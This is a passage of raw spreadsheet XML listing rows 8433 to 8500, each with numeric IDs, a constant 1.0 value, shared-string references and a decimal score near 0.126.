      </c>
      <c r="B8433" s="2">
        <v>4198172.0</v>
      </c>
      <c r="C8433" s="2" t="s">
        <v>8022</v>
      </c>
      <c r="D8433" s="2">
        <v>1.0</v>
      </c>
      <c r="E8433" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8433" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="8434" ht="15.75" customHeight="1">
      <c r="A8434" s="1">
        <v>30865.0</v>
      </c>
      <c r="B8434" s="2">
        <v>4.6223097E7</v>
      </c>
      <c r="C8434" s="2" t="s">
        <v>8023</v>
      </c>
      <c r="D8434" s="2">
        <v>1.0</v>
      </c>
      <c r="E8434" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8434" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="8435" ht="15.75" customHeight="1">
      <c r="A8435" s="1">
        <v>30866.0</v>
      </c>
      <c r="B8435" s="2">
        <v>4.6223097E7</v>
      </c>
      <c r="C8435" s="2" t="s">
        <v>8024</v>
      </c>
      <c r="D8435" s="2">
        <v>1.0</v>
      </c>
      <c r="E8435" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8435" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="8436" ht="15.75" customHeight="1">
      <c r="A8436" s="1">
        <v>33204.0</v>
      </c>
      <c r="B8436" s="2">
        <v>7169864.0</v>
      </c>
      <c r="C8436" s="2" t="s">
        <v>8025</v>
      </c>
      <c r="D8436" s="2">
        <v>1.0</v>
      </c>
      <c r="E8436" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8436" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="8437" ht="15.75" customHeight="1">
      <c r="A8437" s="1">
        <v>34064.0</v>
      </c>
      <c r="B8437" s="2">
        <v>9627707.0</v>
      </c>
      <c r="C8437" s="2" t="s">
        <v>8026</v>
      </c>
      <c r="D8437" s="2">
        <v>1.0</v>
      </c>
      <c r="E8437" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8437" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="8438" ht="15.75" customHeight="1">
      <c r="A8438" s="1">
        <v>13949.0</v>
      </c>
      <c r="B8438" s="2">
        <v>3.7203133E7</v>
      </c>
      <c r="C8438" s="2" t="s">
        <v>8027</v>
      </c>
      <c r="D8438" s="2">
        <v>1.0</v>
      </c>
      <c r="E8438" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8438" s="2">
        <v>0.1278659611992946</v>
      </c>
    </row>
    <row r="8439" ht="15.75" customHeight="1">
      <c r="A8439" s="1">
        <v>16930.0</v>
      </c>
      <c r="B8439" s="2">
        <v>4.8159925E7</v>
      </c>
      <c r="C8439" s="2" t="s">
        <v>8028</v>
      </c>
      <c r="D8439" s="2">
        <v>1.0</v>
      </c>
      <c r="E8439" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8439" s="2">
        <v>0.1278659611992946</v>
      </c>
    </row>
    <row r="8440" ht="15.75" customHeight="1">
      <c r="A8440" s="1">
        <v>10648.0</v>
      </c>
      <c r="B8440" s="2">
        <v>1.4148418E7</v>
      </c>
      <c r="C8440" s="2" t="s">
        <v>8029</v>
      </c>
      <c r="D8440" s="2">
        <v>1.0</v>
      </c>
      <c r="E8440" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8440" s="2">
        <v>0.1276803118908382</v>
      </c>
    </row>
    <row r="8441" ht="15.75" customHeight="1">
      <c r="A8441" s="1">
        <v>17047.0</v>
      </c>
      <c r="B8441" s="2">
        <v>4.8533266E7</v>
      </c>
      <c r="C8441" s="2" t="s">
        <v>8030</v>
      </c>
      <c r="D8441" s="2">
        <v>1.0</v>
      </c>
      <c r="E8441" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8441" s="2">
        <v>0.1276803118908382</v>
      </c>
    </row>
    <row r="8442" ht="15.75" customHeight="1">
      <c r="A8442" s="1">
        <v>27101.0</v>
      </c>
      <c r="B8442" s="2">
        <v>2.0547628E7</v>
      </c>
      <c r="C8442" s="2" t="s">
        <v>8031</v>
      </c>
      <c r="D8442" s="2">
        <v>1.0</v>
      </c>
      <c r="E8442" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8442" s="2">
        <v>0.1276803118908382</v>
      </c>
    </row>
    <row r="8443" ht="15.75" customHeight="1">
      <c r="A8443" s="1">
        <v>33246.0</v>
      </c>
      <c r="B8443" s="2">
        <v>7314922.0</v>
      </c>
      <c r="C8443" s="2" t="s">
        <v>8032</v>
      </c>
      <c r="D8443" s="2">
        <v>1.0</v>
      </c>
      <c r="E8443" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8443" s="2">
        <v>0.1276803118908382</v>
      </c>
    </row>
    <row r="8444" ht="15.75" customHeight="1">
      <c r="A8444" s="1">
        <v>1317.0</v>
      </c>
      <c r="B8444" s="2">
        <v>2.5706431E7</v>
      </c>
      <c r="C8444" s="2" t="s">
        <v>8033</v>
      </c>
      <c r="D8444" s="2">
        <v>1.0</v>
      </c>
      <c r="E8444" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8444" s="2">
        <v>0.1276041666666667</v>
      </c>
    </row>
    <row r="8445" ht="15.75" customHeight="1">
      <c r="A8445" s="1">
        <v>3610.0</v>
      </c>
      <c r="B8445" s="2">
        <v>3.9137568E7</v>
      </c>
      <c r="C8445" s="2" t="s">
        <v>8034</v>
      </c>
      <c r="D8445" s="2">
        <v>1.0</v>
      </c>
      <c r="E8445" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8445" s="2">
        <v>0.1276041666666667</v>
      </c>
    </row>
    <row r="8446" ht="15.75" customHeight="1">
      <c r="A8446" s="1">
        <v>6021.0</v>
      </c>
      <c r="B8446" s="2">
        <v>4.7504681E7</v>
      </c>
      <c r="C8446" s="2" t="s">
        <v>8035</v>
      </c>
      <c r="D8446" s="2">
        <v>1.0</v>
      </c>
      <c r="E8446" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8446" s="2">
        <v>0.1276041666666667</v>
      </c>
    </row>
    <row r="8447" ht="15.75" customHeight="1">
      <c r="A8447" s="1">
        <v>9663.0</v>
      </c>
      <c r="B8447" s="2">
        <v>5.6303894E7</v>
      </c>
      <c r="C8447" s="2" t="s">
        <v>8036</v>
      </c>
      <c r="D8447" s="2">
        <v>1.0</v>
      </c>
      <c r="E8447" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8447" s="2">
        <v>0.1276041666666667</v>
      </c>
    </row>
    <row r="8448" ht="15.75" customHeight="1">
      <c r="A8448" s="1">
        <v>15404.0</v>
      </c>
      <c r="B8448" s="2">
        <v>4.2832816E7</v>
      </c>
      <c r="C8448" s="2" t="s">
        <v>8037</v>
      </c>
      <c r="D8448" s="2">
        <v>1.0</v>
      </c>
      <c r="E8448" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8448" s="2">
        <v>0.1276041666666667</v>
      </c>
    </row>
    <row r="8449" ht="15.75" customHeight="1">
      <c r="A8449" s="1">
        <v>26160.0</v>
      </c>
      <c r="B8449" s="2">
        <v>1.6083655E7</v>
      </c>
      <c r="C8449" s="2" t="s">
        <v>8038</v>
      </c>
      <c r="D8449" s="2">
        <v>1.0</v>
      </c>
      <c r="E8449" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8449" s="2">
        <v>0.1276041666666667</v>
      </c>
    </row>
    <row r="8450" ht="15.75" customHeight="1">
      <c r="A8450" s="1">
        <v>26653.0</v>
      </c>
      <c r="B8450" s="2">
        <v>1.8059799E7</v>
      </c>
      <c r="C8450" s="2" t="s">
        <v>8039</v>
      </c>
      <c r="D8450" s="2">
        <v>1.0</v>
      </c>
      <c r="E8450" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8450" s="2">
        <v>0.1276041666666667</v>
      </c>
    </row>
    <row r="8451" ht="15.75" customHeight="1">
      <c r="A8451" s="1">
        <v>403.0</v>
      </c>
      <c r="B8451" s="2">
        <v>1.6680522E7</v>
      </c>
      <c r="C8451" s="2" t="s">
        <v>8040</v>
      </c>
      <c r="D8451" s="2">
        <v>1.0</v>
      </c>
      <c r="E8451" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8451" s="2">
        <v>0.1273946360153257</v>
      </c>
    </row>
    <row r="8452" ht="15.75" customHeight="1">
      <c r="A8452" s="1">
        <v>13177.0</v>
      </c>
      <c r="B8452" s="2">
        <v>3.4012539E7</v>
      </c>
      <c r="C8452" s="2" t="s">
        <v>8041</v>
      </c>
      <c r="D8452" s="2">
        <v>1.0</v>
      </c>
      <c r="E8452" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8452" s="2">
        <v>0.1273946360153257</v>
      </c>
    </row>
    <row r="8453" ht="15.75" customHeight="1">
      <c r="A8453" s="1">
        <v>28418.0</v>
      </c>
      <c r="B8453" s="2">
        <v>2.6388112E7</v>
      </c>
      <c r="C8453" s="2" t="s">
        <v>8042</v>
      </c>
      <c r="D8453" s="2">
        <v>1.0</v>
      </c>
      <c r="E8453" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8453" s="2">
        <v>0.1273946360153257</v>
      </c>
    </row>
    <row r="8454" ht="15.75" customHeight="1">
      <c r="A8454" s="1">
        <v>292.0</v>
      </c>
      <c r="B8454" s="2">
        <v>1.5474272E7</v>
      </c>
      <c r="C8454" s="2" t="s">
        <v>8043</v>
      </c>
      <c r="D8454" s="2">
        <v>1.0</v>
      </c>
      <c r="E8454" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8454" s="2">
        <v>0.1273504273504274</v>
      </c>
    </row>
    <row r="8455" ht="15.75" customHeight="1">
      <c r="A8455" s="1">
        <v>5602.0</v>
      </c>
      <c r="B8455" s="2">
        <v>4.6136334E7</v>
      </c>
      <c r="C8455" s="2" t="s">
        <v>8044</v>
      </c>
      <c r="D8455" s="2">
        <v>1.0</v>
      </c>
      <c r="E8455" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8455" s="2">
        <v>0.1271186440677966</v>
      </c>
    </row>
    <row r="8456" ht="15.75" customHeight="1">
      <c r="A8456" s="1">
        <v>8295.0</v>
      </c>
      <c r="B8456" s="2">
        <v>5.3529567E7</v>
      </c>
      <c r="C8456" s="2" t="s">
        <v>8045</v>
      </c>
      <c r="D8456" s="2">
        <v>1.0</v>
      </c>
      <c r="E8456" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8456" s="2">
        <v>0.1271186440677966</v>
      </c>
    </row>
    <row r="8457" ht="15.75" customHeight="1">
      <c r="A8457" s="1">
        <v>12472.0</v>
      </c>
      <c r="B8457" s="2">
        <v>2.9442776E7</v>
      </c>
      <c r="C8457" s="2" t="s">
        <v>8046</v>
      </c>
      <c r="D8457" s="2">
        <v>1.0</v>
      </c>
      <c r="E8457" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8457" s="2">
        <v>0.1271186440677966</v>
      </c>
    </row>
    <row r="8458" ht="15.75" customHeight="1">
      <c r="A8458" s="1">
        <v>15081.0</v>
      </c>
      <c r="B8458" s="2">
        <v>4.1754293E7</v>
      </c>
      <c r="C8458" s="2" t="s">
        <v>8047</v>
      </c>
      <c r="D8458" s="2">
        <v>1.0</v>
      </c>
      <c r="E8458" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8458" s="2">
        <v>0.1271186440677966</v>
      </c>
    </row>
    <row r="8459" ht="15.75" customHeight="1">
      <c r="A8459" s="1">
        <v>8693.0</v>
      </c>
      <c r="B8459" s="2">
        <v>5.4418783E7</v>
      </c>
      <c r="C8459" s="2" t="s">
        <v>8048</v>
      </c>
      <c r="D8459" s="2">
        <v>1.0</v>
      </c>
      <c r="E8459" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8459" s="2">
        <v>0.1268343815513627</v>
      </c>
    </row>
    <row r="8460" ht="15.75" customHeight="1">
      <c r="A8460" s="1">
        <v>10348.0</v>
      </c>
      <c r="B8460" s="2">
        <v>5930645.0</v>
      </c>
      <c r="C8460" s="2" t="s">
        <v>8049</v>
      </c>
      <c r="D8460" s="2">
        <v>1.0</v>
      </c>
      <c r="E8460" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8460" s="2">
        <v>0.1268343815513627</v>
      </c>
    </row>
    <row r="8461" ht="15.75" customHeight="1">
      <c r="A8461" s="1">
        <v>19345.0</v>
      </c>
      <c r="B8461" s="2">
        <v>5.5380332E7</v>
      </c>
      <c r="C8461" s="2" t="s">
        <v>8050</v>
      </c>
      <c r="D8461" s="2">
        <v>1.0</v>
      </c>
      <c r="E8461" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8461" s="2">
        <v>0.1266339869281046</v>
      </c>
    </row>
    <row r="8462" ht="15.75" customHeight="1">
      <c r="A8462" s="1">
        <v>22782.0</v>
      </c>
      <c r="B8462" s="2">
        <v>4.5245136E7</v>
      </c>
      <c r="C8462" s="2" t="s">
        <v>8051</v>
      </c>
      <c r="D8462" s="2">
        <v>1.0</v>
      </c>
      <c r="E8462" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8462" s="2">
        <v>0.1266339869281046</v>
      </c>
    </row>
    <row r="8463" ht="15.75" customHeight="1">
      <c r="A8463" s="1">
        <v>29393.0</v>
      </c>
      <c r="B8463" s="2">
        <v>3.1932651E7</v>
      </c>
      <c r="C8463" s="2" t="s">
        <v>8052</v>
      </c>
      <c r="D8463" s="2">
        <v>1.0</v>
      </c>
      <c r="E8463" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8463" s="2">
        <v>0.1266339869281046</v>
      </c>
    </row>
    <row r="8464" ht="15.75" customHeight="1">
      <c r="A8464" s="1">
        <v>6306.0</v>
      </c>
      <c r="B8464" s="2">
        <v>4.8240545E7</v>
      </c>
      <c r="C8464" s="2" t="s">
        <v>8053</v>
      </c>
      <c r="D8464" s="2">
        <v>1.0</v>
      </c>
      <c r="E8464" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8464" s="2">
        <v>0.1265432098765432</v>
      </c>
    </row>
    <row r="8465" ht="15.75" customHeight="1">
      <c r="A8465" s="1">
        <v>6838.0</v>
      </c>
      <c r="B8465" s="2">
        <v>4.9607346E7</v>
      </c>
      <c r="C8465" s="2" t="s">
        <v>8054</v>
      </c>
      <c r="D8465" s="2">
        <v>1.0</v>
      </c>
      <c r="E8465" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8465" s="2">
        <v>0.1265432098765432</v>
      </c>
    </row>
    <row r="8466" ht="15.75" customHeight="1">
      <c r="A8466" s="1">
        <v>8280.0</v>
      </c>
      <c r="B8466" s="2">
        <v>5.3469505E7</v>
      </c>
      <c r="C8466" s="2" t="s">
        <v>8055</v>
      </c>
      <c r="D8466" s="2">
        <v>1.0</v>
      </c>
      <c r="E8466" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8466" s="2">
        <v>0.1265432098765432</v>
      </c>
    </row>
    <row r="8467" ht="15.75" customHeight="1">
      <c r="A8467" s="1">
        <v>18914.0</v>
      </c>
      <c r="B8467" s="2">
        <v>5.4204296E7</v>
      </c>
      <c r="C8467" s="2" t="s">
        <v>8056</v>
      </c>
      <c r="D8467" s="2">
        <v>1.0</v>
      </c>
      <c r="E8467" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8467" s="2">
        <v>0.1265432098765432</v>
      </c>
    </row>
    <row r="8468" ht="15.75" customHeight="1">
      <c r="A8468" s="1">
        <v>24428.0</v>
      </c>
      <c r="B8468" s="2">
        <v>1.0851147E7</v>
      </c>
      <c r="C8468" s="2" t="s">
        <v>8057</v>
      </c>
      <c r="D8468" s="2">
        <v>1.0</v>
      </c>
      <c r="E8468" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8468" s="2">
        <v>0.1263440860215054</v>
      </c>
    </row>
    <row r="8469" ht="15.75" customHeight="1">
      <c r="A8469" s="1">
        <v>25061.0</v>
      </c>
      <c r="B8469" s="2">
        <v>1.2869158E7</v>
      </c>
      <c r="C8469" s="2" t="s">
        <v>8058</v>
      </c>
      <c r="D8469" s="2">
        <v>1.0</v>
      </c>
      <c r="E8469" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8469" s="2">
        <v>0.1262626262626263</v>
      </c>
    </row>
    <row r="8470" ht="15.75" customHeight="1">
      <c r="A8470" s="1">
        <v>1211.0</v>
      </c>
      <c r="B8470" s="2">
        <v>2.4853597E7</v>
      </c>
      <c r="C8470" s="2" t="s">
        <v>8059</v>
      </c>
      <c r="D8470" s="2">
        <v>1.0</v>
      </c>
      <c r="E8470" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8470" s="2">
        <v>0.1262626262626262</v>
      </c>
    </row>
    <row r="8471" ht="15.75" customHeight="1">
      <c r="A8471" s="1">
        <v>28969.0</v>
      </c>
      <c r="B8471" s="2">
        <v>2.9812644E7</v>
      </c>
      <c r="C8471" s="2" t="s">
        <v>8060</v>
      </c>
      <c r="D8471" s="2">
        <v>1.0</v>
      </c>
      <c r="E8471" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8471" s="2">
        <v>0.1262626262626262</v>
      </c>
    </row>
    <row r="8472" ht="15.75" customHeight="1">
      <c r="A8472" s="1">
        <v>19618.0</v>
      </c>
      <c r="B8472" s="2">
        <v>5.6215272E7</v>
      </c>
      <c r="C8472" s="2" t="s">
        <v>8061</v>
      </c>
      <c r="D8472" s="2">
        <v>1.0</v>
      </c>
      <c r="E8472" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8472" s="2">
        <v>0.1261022927689595</v>
      </c>
    </row>
    <row r="8473" ht="15.75" customHeight="1">
      <c r="A8473" s="1">
        <v>25191.0</v>
      </c>
      <c r="B8473" s="2">
        <v>1.3174671E7</v>
      </c>
      <c r="C8473" s="2" t="s">
        <v>8062</v>
      </c>
      <c r="D8473" s="2">
        <v>1.0</v>
      </c>
      <c r="E8473" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8473" s="2">
        <v>0.1261022927689595</v>
      </c>
    </row>
    <row r="8474" ht="15.75" customHeight="1">
      <c r="A8474" s="1">
        <v>1902.0</v>
      </c>
      <c r="B8474" s="2">
        <v>2.9952691E7</v>
      </c>
      <c r="C8474" s="2" t="s">
        <v>8063</v>
      </c>
      <c r="D8474" s="2">
        <v>1.0</v>
      </c>
      <c r="E8474" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8474" s="2">
        <v>0.1259920634920635</v>
      </c>
    </row>
    <row r="8475" ht="15.75" customHeight="1">
      <c r="A8475" s="1">
        <v>3440.0</v>
      </c>
      <c r="B8475" s="2">
        <v>3.8219513E7</v>
      </c>
      <c r="C8475" s="2" t="s">
        <v>8064</v>
      </c>
      <c r="D8475" s="2">
        <v>1.0</v>
      </c>
      <c r="E8475" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8475" s="2">
        <v>0.1259920634920635</v>
      </c>
    </row>
    <row r="8476" ht="15.75" customHeight="1">
      <c r="A8476" s="1">
        <v>3591.0</v>
      </c>
      <c r="B8476" s="2">
        <v>3.9047792E7</v>
      </c>
      <c r="C8476" s="2" t="s">
        <v>8065</v>
      </c>
      <c r="D8476" s="2">
        <v>1.0</v>
      </c>
      <c r="E8476" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8476" s="2">
        <v>0.1259920634920635</v>
      </c>
    </row>
    <row r="8477" ht="15.75" customHeight="1">
      <c r="A8477" s="1">
        <v>10480.0</v>
      </c>
      <c r="B8477" s="2">
        <v>1.0905298E7</v>
      </c>
      <c r="C8477" s="2" t="s">
        <v>8066</v>
      </c>
      <c r="D8477" s="2">
        <v>1.0</v>
      </c>
      <c r="E8477" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8477" s="2">
        <v>0.1259920634920635</v>
      </c>
    </row>
    <row r="8478" ht="15.75" customHeight="1">
      <c r="A8478" s="1">
        <v>14776.0</v>
      </c>
      <c r="B8478" s="2">
        <v>4.0878001E7</v>
      </c>
      <c r="C8478" s="2" t="s">
        <v>8067</v>
      </c>
      <c r="D8478" s="2">
        <v>1.0</v>
      </c>
      <c r="E8478" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8478" s="2">
        <v>0.1259920634920635</v>
      </c>
    </row>
    <row r="8479" ht="15.75" customHeight="1">
      <c r="A8479" s="1">
        <v>15426.0</v>
      </c>
      <c r="B8479" s="2">
        <v>4.2922415E7</v>
      </c>
      <c r="C8479" s="2" t="s">
        <v>8068</v>
      </c>
      <c r="D8479" s="2">
        <v>1.0</v>
      </c>
      <c r="E8479" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8479" s="2">
        <v>0.1259920634920635</v>
      </c>
    </row>
    <row r="8480" ht="15.75" customHeight="1">
      <c r="A8480" s="1">
        <v>19792.0</v>
      </c>
      <c r="B8480" s="2">
        <v>5.6821772E7</v>
      </c>
      <c r="C8480" s="2" t="s">
        <v>8069</v>
      </c>
      <c r="D8480" s="2">
        <v>1.0</v>
      </c>
      <c r="E8480" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8480" s="2">
        <v>0.1259920634920635</v>
      </c>
    </row>
    <row r="8481" ht="15.75" customHeight="1">
      <c r="A8481" s="1">
        <v>30010.0</v>
      </c>
      <c r="B8481" s="2">
        <v>3.6153369E7</v>
      </c>
      <c r="C8481" s="2" t="s">
        <v>8070</v>
      </c>
      <c r="D8481" s="2">
        <v>1.0</v>
      </c>
      <c r="E8481" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8481" s="2">
        <v>0.1259920634920635</v>
      </c>
    </row>
    <row r="8482" ht="15.75" customHeight="1">
      <c r="A8482" s="1">
        <v>1108.0</v>
      </c>
      <c r="B8482" s="2">
        <v>2.403942E7</v>
      </c>
      <c r="C8482" s="2" t="s">
        <v>8071</v>
      </c>
      <c r="D8482" s="2">
        <v>1.0</v>
      </c>
      <c r="E8482" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8482" s="2">
        <v>0.1259780907668232</v>
      </c>
    </row>
    <row r="8483" ht="15.75" customHeight="1">
      <c r="A8483" s="1">
        <v>345.0</v>
      </c>
      <c r="B8483" s="2">
        <v>1.5923378E7</v>
      </c>
      <c r="C8483" s="2" t="s">
        <v>8072</v>
      </c>
      <c r="D8483" s="2">
        <v>1.0</v>
      </c>
      <c r="E8483" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8483" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="8484" ht="15.75" customHeight="1">
      <c r="A8484" s="1">
        <v>845.0</v>
      </c>
      <c r="B8484" s="2">
        <v>2.1687867E7</v>
      </c>
      <c r="C8484" s="2" t="s">
        <v>8073</v>
      </c>
      <c r="D8484" s="2">
        <v>1.0</v>
      </c>
      <c r="E8484" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8484" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="8485" ht="15.75" customHeight="1">
      <c r="A8485" s="1">
        <v>1748.0</v>
      </c>
      <c r="B8485" s="2">
        <v>2.883733E7</v>
      </c>
      <c r="C8485" s="2" t="s">
        <v>8074</v>
      </c>
      <c r="D8485" s="2">
        <v>1.0</v>
      </c>
      <c r="E8485" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8485" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="8486" ht="15.75" customHeight="1">
      <c r="A8486" s="1">
        <v>1937.0</v>
      </c>
      <c r="B8486" s="2">
        <v>3.0189749E7</v>
      </c>
      <c r="C8486" s="2" t="s">
        <v>8075</v>
      </c>
      <c r="D8486" s="2">
        <v>1.0</v>
      </c>
      <c r="E8486" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8486" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="8487" ht="15.75" customHeight="1">
      <c r="A8487" s="1">
        <v>2477.0</v>
      </c>
      <c r="B8487" s="2">
        <v>3.3848469E7</v>
      </c>
      <c r="C8487" s="2" t="s">
        <v>8076</v>
      </c>
      <c r="D8487" s="2">
        <v>1.0</v>
      </c>
      <c r="E8487" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8487" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="8488" ht="15.75" customHeight="1">
      <c r="A8488" s="1">
        <v>2982.0</v>
      </c>
      <c r="B8488" s="2">
        <v>3.6180907E7</v>
      </c>
      <c r="C8488" s="2" t="s">
        <v>8077</v>
      </c>
      <c r="D8488" s="2">
        <v>1.0</v>
      </c>
      <c r="E8488" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8488" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="8489" ht="15.75" customHeight="1">
      <c r="A8489" s="1">
        <v>3398.0</v>
      </c>
      <c r="B8489" s="2">
        <v>3.8027085E7</v>
      </c>
      <c r="C8489" s="2" t="s">
        <v>8078</v>
      </c>
      <c r="D8489" s="2">
        <v>1.0</v>
      </c>
      <c r="E8489" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8489" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="8490" ht="15.75" customHeight="1">
      <c r="A8490" s="1">
        <v>3884.0</v>
      </c>
      <c r="B8490" s="2">
        <v>4036498.0</v>
      </c>
      <c r="C8490" s="2" t="s">
        <v>8079</v>
      </c>
      <c r="D8490" s="2">
        <v>1.0</v>
      </c>
      <c r="E8490" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8490" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="8491" ht="15.75" customHeight="1">
      <c r="A8491" s="1">
        <v>3920.0</v>
      </c>
      <c r="B8491" s="2">
        <v>4.0555092E7</v>
      </c>
      <c r="C8491" s="2" t="s">
        <v>8080</v>
      </c>
      <c r="D8491" s="2">
        <v>1.0</v>
      </c>
      <c r="E8491" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8491" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="8492" ht="15.75" customHeight="1">
      <c r="A8492" s="1">
        <v>3927.0</v>
      </c>
      <c r="B8492" s="2">
        <v>4.0562334E7</v>
      </c>
      <c r="C8492" s="2" t="s">
        <v>8081</v>
      </c>
      <c r="D8492" s="2">
        <v>1.0</v>
      </c>
      <c r="E8492" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8492" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="8493" ht="15.75" customHeight="1">
      <c r="A8493" s="1">
        <v>5439.0</v>
      </c>
      <c r="B8493" s="2">
        <v>4.560216E7</v>
      </c>
      <c r="C8493" s="2" t="s">
        <v>8082</v>
      </c>
      <c r="D8493" s="2">
        <v>1.0</v>
      </c>
      <c r="E8493" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8493" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="8494" ht="15.75" customHeight="1">
      <c r="A8494" s="1">
        <v>5769.0</v>
      </c>
      <c r="B8494" s="2">
        <v>4.6706311E7</v>
      </c>
      <c r="C8494" s="2" t="s">
        <v>8083</v>
      </c>
      <c r="D8494" s="2">
        <v>1.0</v>
      </c>
      <c r="E8494" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8494" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="8495" ht="15.75" customHeight="1">
      <c r="A8495" s="1">
        <v>5792.0</v>
      </c>
      <c r="B8495" s="2">
        <v>4.6776553E7</v>
      </c>
      <c r="C8495" s="2" t="s">
        <v>8084</v>
      </c>
      <c r="D8495" s="2">
        <v>1.0</v>
      </c>
      <c r="E8495" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8495" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="8496" ht="15.75" customHeight="1">
      <c r="A8496" s="1">
        <v>6703.0</v>
      </c>
      <c r="B8496" s="2">
        <v>4.9216765E7</v>
      </c>
      <c r="C8496" s="2" t="s">
        <v>8085</v>
      </c>
      <c r="D8496" s="2">
        <v>1.0</v>
      </c>
      <c r="E8496" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8496" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="8497" ht="15.75" customHeight="1">
      <c r="A8497" s="1">
        <v>7198.0</v>
      </c>
      <c r="B8497" s="2">
        <v>5.0593656E7</v>
      </c>
      <c r="C8497" s="2" t="s">
        <v>8086</v>
      </c>
      <c r="D8497" s="2">
        <v>1.0</v>
      </c>
      <c r="E8497" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8497" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="8498" ht="15.75" customHeight="1">
      <c r="A8498" s="1">
        <v>7795.0</v>
      </c>
      <c r="B8498" s="2">
        <v>5.220815E7</v>
      </c>
      <c r="C8498" s="2" t="s">
        <v>8087</v>
      </c>
      <c r="D8498" s="2">
        <v>1.0</v>
      </c>
      <c r="E8498" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8498" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="8499" ht="15.75" customHeight="1">
      <c r="A8499" s="1">
        <v>7876.0</v>
      </c>
      <c r="B8499" s="2">
        <v>5.2410303E7</v>
      </c>
      <c r="C8499" s="2" t="s">
        <v>8088</v>
      </c>
      <c r="D8499" s="2">
        <v>1.0</v>
      </c>
      <c r="E8499" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8499" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="8500" ht="15.75" customHeight="1">
      <c r="A8500" s="1">
        <v>8877.0</v>
      </c>
